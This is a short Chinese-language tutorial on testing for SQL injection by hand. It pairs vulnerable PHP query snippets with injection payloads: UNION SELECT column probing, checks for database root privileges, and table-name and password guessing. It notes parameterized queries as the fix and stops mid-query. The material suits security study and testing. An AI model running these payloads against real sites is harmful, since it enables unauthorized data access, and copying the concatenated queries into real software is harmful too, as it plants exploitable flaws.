SQL注入手工检测
SQL注入手工检测
1基本检测
数字型、字符型、搜索型、POST注入、布尔盲注、报错注入、堆叠注入、判断是什么数据库
2 绕过技巧
大小写、替换关键字、使用编码、注释和符号、等价函数与命令、特殊符号
2017年12月14日 09:36:16
1、基本检测
数字型
$id=@$_GET['id'];
$sql = "SELECT * FROM sqltest WHERE id='$id'";
成因：$id 未经任何校验就直接拼进 SQL 字符串；用参数化查询（预处理语句）绑定值即可从根本上避免。
判断
asp?id=49'
asp?id=49 and 1=1
asp?id=49 and 1=2
判断什么型
?id=1%2b1（%2b 为 URL 编码的 +）
数据库权限判断，判断当前连接用户是否为 root
and ord(mid(user(),1,1))=114 或
and (select count(*) from mysql.user)>0
判断字段数：union select 的列数与原查询一致时页面返回正常，也可以写相同个数的 null
php?id=1 and 1=1 union select 1,2,3,4,5 或
php?id=1 union select null,null,null.....
php?id=1 and 1=1 order by 3
强制返回记录
php?id=2 union select 1,2,3 limit 1,1
字符型
$sql="select * from user where username = '$name'";
select * from user where username = 'admin'
$query="select first_name from users where id='$_GET['id']'";
1' union select database() #; //输入
select first_name from users where id='1'union select database()#'
判断
xx
' and '1'=1--'
xx
' and '1=2--'
猜字段
php?username=admin' union select 1,2,3,4 and '1'='1
猜对后说明有 4 个字段，再把相应的回显位替换成要查询的表达式：
php?username=admin' union select database(),version(),3,4 and '1'='1
猜表名
php?username=admin'+and+(select+count(*)+from+user)>0+and+''='
猜密码
php?username=admin' and password='fendo
搜索型
$sql="select * from user where password like '%$pwd%' order by password";
'and 1=1 and '%'='
select * from user
where password like
'